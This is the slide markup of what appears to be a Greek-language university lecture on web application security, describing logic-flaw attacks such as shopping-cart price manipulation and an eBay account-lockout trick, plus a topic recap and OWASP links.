              <a:rPr b="0" i="0" lang="el" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Ο εισβολέας προσθέτοντας και αφαιρώντας αντικείμενα σε ένα καλάθι αγορών μπορεί να καταλήξει να πληρώσει λιγότερα από το συνολικό κόστος των προϊόντων.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="534" name="Shape 53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Logic Flaws</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pic>
        <p:nvPicPr>
          <p:cNvPr id="539" name="Shape 539"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7067557" y="209550"/>
            <a:ext cx="2000241" cy="1066799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="540" name="Shape 54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Η υπηρεσία eBay εμφάνιζε το user ID του πλειοδότη για κάθε πλειστηριασμό</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Ένας εισβολέας προσπαθεί να κάνει login στον λογαριασμό του πλειοδότη και αποτυγχάνει εσκεμμένα τρεις φορές.</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Το eBay έχει μηχανισμό password throttling οπότε ο λογαριασμός του πλειοδότη μπλοκάρεται για ένα προκαθορισμένο χρονικό διάστημα.</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l" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Ο εισβολέας κάνει μεγαλύτερη προσφορά από τον πλειοδότη ενώ ο λογαριασμός του πλειοδότη παραμένει κλειδωμένος και κερδίζει τον πλειστηριασμό</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="541" name="Shape 54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Account lockout attack</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3000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Account lockout </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el" sz="3000"/>
              <a:t>examples</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0" name="Shape 550"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="551" name="Shape 551"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295"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Μάθαμε</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="552" name="Shape 552"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1132025"/>
            <a:ext cx="8229600" cy="40116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Επίθεση και άμυνα σε web εφαρμογές</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Injection attacks</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Shell injection</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SQL injections</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Blind SQL injections</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XSS</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CSRF, cross-origin, same-origin</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Cookies</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Session hijack</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Clickjacking</a:t>
            </a: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Λογικά σφάλματα</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pic>
        <p:nvPicPr>
          <p:cNvPr id="74" name="Shape 74"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9107600" cy="5143499"/>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6" name="Shape 556"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="557" name="Shape 557"/>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l" sz="4800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Συγχαρητήρια!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="558" name="Shape 558"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2840047"/>
            <a:ext cx="7772400" cy="12488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Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Μπορείτε να κάνετε τις εφαρμογές σας πιο ασφαλείς</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2" name="Shape 562"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="563" name="Shape 56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l" sz="3600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="564" name="Shape 56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The Open Web Application Security Project.</a:t>
            </a:r>
            <a:br>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:b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Στοχεύει στην κατανόηση και στην βελτίωση της ασφάλειας των web εφαρμογών.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="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The Top Ten vulnerability list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/Top_10_201</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el" sz="1800" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>-Top_10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="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l" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Η ελληνική OWASP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/Greece</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="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pic>
        <p:nvPicPr>
          <p:cNvPr id="569" name="Shape 569"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000"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